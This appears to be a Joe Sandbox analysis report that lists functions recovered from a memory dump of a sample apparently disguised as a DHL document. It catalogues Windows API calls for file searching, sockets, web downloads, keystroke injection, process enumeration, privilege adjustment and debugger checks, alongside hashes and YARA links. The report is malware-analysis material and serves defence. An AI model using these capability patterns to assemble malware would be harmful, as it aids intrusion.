Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: c4815cb55d87f049dd2c5a32395af9494231766d0c45aa39a3b3c0c364d3c0c5
Instruction ID: 2c7c2441f23b44ca2f709a72bfc5c039a972821871ce597cdfbcf68fde99a172
Opcode Fuzzy Hash: c4815cb55d87f049dd2c5a32395af9494231766d0c45aa39a3b3c0c364d3c0c5
Instruction Fuzzy Hash: CD31E072504319AFD720DF54DC49B6BBBA9FF88324F400929F98597281DB34EA08DBD2

Function 00F39B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00EC9CB3: _wcslen.LIBCMT ref: 00EC9CBD

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00F39B78
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00F39C8B

Part of subcall function 00F33874: GetInputState.USER32 ref: 00F338CB
Part of subcall function 00F33874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F33966

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00F39BA8
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00F39C75

Strings

*.*, xrefs: 00F39B5D

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
String ID: *.*
API String ID: 1972594611-438819550
Opcode ID: 0713973e474a1e19d7cbba3e0f52c7516bce2b70787afcc76d7411fd6bf7b6e7
Instruction ID: 394e41c26c7159c2b71d12de4d1807f7b03676b4bcf3b14269259d4ea7777900
Opcode Fuzzy Hash: 0713973e474a1e19d7cbba3e0f52c7516bce2b70787afcc76d7411fd6bf7b6e7
Instruction Fuzzy Hash: 2C41B071D0820A9FCF14DF64C989AEEBBF4EF05360F244059E815A2191EBB19E84DFA0

Function 00ED997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON

Download Yara Rule

APIs

Part of subcall function 00ED9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00ED9BB2

DefDlgProcW.USER32(?,?,?,?,?), ref: 00ED9A4E
GetSysColor.USER32(0000000F), ref: 00ED9B23
SetBkColor.GDI32(?,00000000), ref: 00ED9B36

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Color$LongProcWindow
String ID:
API String ID: 3131106179-0
Opcode ID: f73186eef0e0f991942d0ba6a8f102e8e0de9d296752cb9d6af8f06644ec2a53
Instruction ID: 44f0c1a9be13774785bb97abf3cb4f4c97c4e61c4b9a17df681b45e9f6a3ba1c
Opcode Fuzzy Hash: f73186eef0e0f991942d0ba6a8f102e8e0de9d296752cb9d6af8f06644ec2a53
Instruction Fuzzy Hash: 92A14871108604AEE728AB3C8C58EFB36ADEB42354F15221BF506E67D3DA259D43F271

Function 00F41806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00F4304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00F4307A
Part of subcall function 00F4304E: _wcslen.LIBCMT ref: 00F4309B

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00F4185D
WSAGetLastError.WSOCK32 ref: 00F41884
bind.WSOCK32(00000000,?,00000010), ref: 00F418DB
WSAGetLastError.WSOCK32 ref: 00F418E6
closesocket.WSOCK32(00000000), ref: 00F41915

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
String ID:
API String ID: 1601658205-0
Opcode ID: e77201294ebe55f165178e253d4f623c95a602535d13ba102600d4734588d852
Instruction ID: 4f1e8db0c6c95d40ef4e54bbc304b1b36b56bf588af8b1755a5a742a70c30ba6
Opcode Fuzzy Hash: e77201294ebe55f165178e253d4f623c95a602535d13ba102600d4734588d852
Instruction Fuzzy Hash: 9E51A271A00210AFEB10AF24C986F2A7BE5EB44718F18805CF9566F3D3D771AD42DBA1

Function 00F51C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00F51CC0
IsWindowEnabled.USER32 ref: 00F51CCE
GetForegroundWindow.USER32(?,?,00000001,?), ref: 00F51CDB
IsIconic.USER32 ref: 00F51CE9
IsZoomed.USER32 ref: 00F51CF7

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 1e2a9dd0fef66f621af6d0c3133f8988a63ea4876b1459f0bfb3dc1a0ff2a218
Instruction ID: ac77ff3c221783714b46d0a351d517ffbf8f916b3388d0fbd1aba4719bb3da4c
Opcode Fuzzy Hash: 1e2a9dd0fef66f621af6d0c3133f8988a63ea4876b1459f0bfb3dc1a0ff2a218
Instruction Fuzzy Hash: 7C218231B402115FD7208F1AC888F667BE5BF95326B19805CED4A8B351D776EC46EB90

Function 00EC8060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON

Download Yara Rule

Strings

ERCP, xrefs: 00EC813C
VUUU, xrefs: 00EC83FA
VUUU, xrefs: 00F05DF0
VUUU, xrefs: 00EC843C
VUUU, xrefs: 00EC83E8

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-1546025612
Opcode ID: 21df2748f70b45aa53a223ae3909dea09f6f7fd108a06a300a5603971e9fd832
Instruction ID: dc98fcb3ed8331fc89ce9727b5dd8a602d563cc0a6e7545870dddb2737c13f3a
Opcode Fuzzy Hash: 21df2748f70b45aa53a223ae3909dea09f6f7fd108a06a300a5603971e9fd832
Instruction Fuzzy Hash: A6A28070E0021ACBDF24CF58CB40BEEB7B1BB54714F2491AAD815A7285DB719D92EF90

Function 00EE4CE8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00EF28E9,(,00EE4CBE,00000000,00F888B8,0000000C,00EE4E15,(,00000002,00000000,?,00EF28E9,00000003,00EF2DF7,?,?), ref: 00EE4D09
TerminateProcess.KERNEL32(00000000,?,00EF28E9,00000003,00EF2DF7,?,?,?,00EEE6D1,?,00F88A48,00000010,00EC4F4A,?,?,00000000), ref: 00EE4D10
ExitProcess.KERNEL32 ref: 00EE4D22

Strings

(, xrefs: 00EE4CEA

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID: (
API String ID: 1703294689-2063206799
Opcode ID: af2d7eb4523c26d0074b5335a915d8b5ffc967571330c15c5235b6f837448c59
Instruction ID: 203ab839a6113e0dd6ea599c924eea04e6696d08d962c963ead95ad45a08e691
Opcode Fuzzy Hash: af2d7eb4523c26d0074b5335a915d8b5ffc967571330c15c5235b6f837448c59
Instruction Fuzzy Hash: 71E0B6B100078CAFCF11AF65DD09A583F69EF81786B105054FE06EA263CB35DD42DA80

Function 00F4A67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00F4A6AC
Process32FirstW.KERNEL32(00000000,?), ref: 00F4A6BA

Part of subcall function 00EC9CB3: _wcslen.LIBCMT ref: 00EC9CBD

Process32NextW.KERNEL32(00000000,?), ref: 00F4A79C
CloseHandle.KERNEL32(00000000), ref: 00F4A7AB

Part of subcall function 00EDCE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00F03303,?), ref: 00EDCE8A

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: 7359f4b0e3e64acd7dc832bf19865ed6d0ee63737919b2d8b3514507ea33204c
Instruction ID: 58d493dc1795de9be0d6c703cd3e757d126530b8b6ed20c8d9cc8693a49b0426
Opcode Fuzzy Hash: 7359f4b0e3e64acd7dc832bf19865ed6d0ee63737919b2d8b3514507ea33204c
Instruction Fuzzy Hash: 08515D715083009FD310EF24C986E6BBBE8FF89754F04591DF986A7292EB31D905CB92

Function 00F2AA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00F2AAAC
SetKeyboardState.USER32(00000080), ref: 00F2AAC8
PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00F2AB36
SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00F2AB88

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 497250b5ffff99b2b4d4ba6ff7262a3cc52c2a4fa0cc0c37b937e4658b4437e3
Instruction ID: 3fd996e12b003d2b13cd9d35a7977d911f55c7af2c9b4f4edc2055f6ff84113f
Opcode Fuzzy Hash: 497250b5ffff99b2b4d4ba6ff7262a3cc52c2a4fa0cc0c37b937e4658b4437e3
Instruction Fuzzy Hash: 0B311A30E40728AFFB358A64AC05BFA7BA6AFC4320F04421AF585561D1D3798985E7A2

Function 00EFBB6F Relevance: 6.1, APIs: 4, Instructions: 90timeCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00EFBB7F

Part of subcall function 00EF29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00EFD7D1,00000000,00000000,00000000,00000000,?,00EFD7F8,00000000,00000007,00000000,?,00EFDBF5,00000000), ref: 00EF29DE
Part of subcall function 00EF29C8: GetLastError.KERNEL32(00000000,?,00EFD7D1,00000000,00000000,00000000,00000000,?,00EFD7F8,00000000,00000007,00000000,?,00EFDBF5,00000000,00000000), ref: 00EF29F0

GetTimeZoneInformation.KERNEL32 ref: 00EFBB91
WideCharToMultiByte.KERNEL32(00000000,?,00F9121C,000000FF,?,0000003F,?,?), ref: 00EFBC09
WideCharToMultiByte.KERNEL32(00000000,?,00F91270,000000FF,?,0000003F,?,?,?,00F9121C,000000FF,?,0000003F,?,?), ref: 00EFBC36

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
String ID:
API String ID: 806657224-0
Opcode ID: 528dece5538715ffc002f342bdf8d5281ef24da13aec58c5ef6418ea5e7d4772
Instruction ID: 3d0e8f5b3ddfbeb01dabf397883491fbe1f8df09bff2b560b0903b842051f7cd
Opcode Fuzzy Hash: 528dece5538715ffc002f342bdf8d5281ef24da13aec58c5ef6418ea5e7d4772
Instruction Fuzzy Hash: ED31C17090420EDFCB11EF69DC8087EBBB8FF4575071492AAE265EB2A1D7309D00EB90

Function 00F3CE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 00F3CE89
GetLastError.KERNEL32(?,00000000), ref: 00F3CEEA
SetEvent.KERNEL32(?,?,00000000), ref: 00F3CEFE

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: 4e5148c975c7ff33c261860e458a62a7e7a88653dce1332ac4e00f8d3437ec61
Instruction ID: 97353621eefa7e0b1deb21715958c113bec80595cfc3757058278d2f6ffc6ebc
Opcode Fuzzy Hash: 4e5148c975c7ff33c261860e458a62a7e7a88653dce1332ac4e00f8d3437ec61
Instruction Fuzzy Hash: 6721CF719003099FD720DFA5C948BAB77FCEB00724F10441EE646E2251E770EE44EBA0

Function 00F2DBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00F05222), ref: 00F2DBCE
GetFileAttributesW.KERNEL32(?), ref: 00F2DBDD
FindFirstFileW.KERNEL32(?,?), ref: 00F2DBEE
FindClose.KERNEL32(00000000), ref: 00F2DBFA

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: a806e110d6743ccf12622a06ccd93601fa7f3550b30f0d2c90b93e054c9ee139
Instruction ID: cfb9e3cfbb51aa01da5140d4eb6fc409e6301a9bc3d7aee89aea324f3e814f8c
Opcode Fuzzy Hash: a806e110d6743ccf12622a06ccd93601fa7f3550b30f0d2c90b93e054c9ee139
Instruction Fuzzy Hash: 1FF0A031850B285B82206B78AC0D8AA3B6C9E01336B104702F936D20E0EBB05954E6D6

Function 00F28298 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 568stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 00F282AA

Strings

|, xrefs: 00F282DA
(, xrefs: 00F282F0

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: f6b957a2d7d348734236327874f95d26552f83b6fe4d2b83ae40e3d8ea97ffcf
Instruction ID: 2adf2eec5f7dfc894b4193a82e4845edf78a84862291102551b3ec186993d2b8
Opcode Fuzzy Hash: f6b957a2d7d348734236327874f95d26552f83b6fe4d2b83ae40e3d8ea97ffcf
Instruction Fuzzy Hash: 3A323875A017159FC728CF59D480AAAB7F0FF48760B15C46EE49ADB3A1DB70E942CB40

Function 00F35C97 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00F35CC1
FindNextFileW.KERNEL32(00000000,?), ref: 00F35D17
FindClose.KERNEL32(?), ref: 00F35D5F

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 5bb49903bbc035185d40851b8a0518c76ddbe1fc83c55725420717f9dcd16e81
Instruction ID: 6facdbffc430518de9c6344ee0ebc89bd9d4c58f5ca526ee7e66823491e7c3c3
Opcode Fuzzy Hash: 5bb49903bbc035185d40851b8a0518c76ddbe1fc83c55725420717f9dcd16e81
Instruction Fuzzy Hash: 1B519975A04B019FC714CF28C494E9AB7E4FF89324F14855EE99A8B3A2CB31ED05DB91

Function 00EF2622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 00EF271A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00EF2724
UnhandledExceptionFilter.KERNEL32(?), ref: 00EF2731

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 6e005b4324860b459f2287389f637b9c6e29591e16047e9b67d5b8a556cbec07
Instruction ID: 470e465d928c3a5fd2bb53667869787d9eac9e3fce5f75209c852649267cd71a
Opcode Fuzzy Hash: 6e005b4324860b459f2287389f637b9c6e29591e16047e9b67d5b8a556cbec07
Instruction Fuzzy Hash: 6E31C47490131C9BCB21DF65DC88798B7B8AF08310F5051EAE51CA6260E7709F818F45

Function 00F351CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00F351DA
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00F35238
SetErrorMode.KERNEL32(00000000), ref: 00F352A1

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 5e119df56aabe61e6b272c8dd9a4ca15c6d94153d3b52036a96760819e3c6333
Instruction ID: 18d74bd48d38aa94bc586e88a7e8dd98485bc864301e0f54e4c9af8829f3d62b
Opcode Fuzzy Hash: 5e119df56aabe61e6b272c8dd9a4ca15c6d94153d3b52036a96760819e3c6333
Instruction Fuzzy Hash: B4313C75A00618DFDB00DF54D884EAEBBF4FF49318F188099E905AB352DB36E856CB90

Function 00F216C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00EDFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00EE0668
Part of subcall function 00EDFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00EE0685

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F2170D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F2173A
GetLastError.KERNEL32 ref: 00F2174A

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 577356006-0
Opcode ID: 9a16315f29b7f9267ae6b80b3f1997413d2b5a5250360d7232ddd8a9cf331708
Instruction ID: 9fe39d154bbe2793ac2240d1c80327d303dadce8a83bef8b963d8f6fa708833c
Opcode Fuzzy Hash: 9a16315f29b7f9267ae6b80b3f1997413d2b5a5250360d7232ddd8a9cf331708
Instruction Fuzzy Hash: 1F1191B2404308AFD718DF54EC86E6BB7F9FB44725B20852EE05697241EB70BC41DA64

Function 00F2D5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00F2D608
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00F2D645
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00F2D650

Memory Dump Source

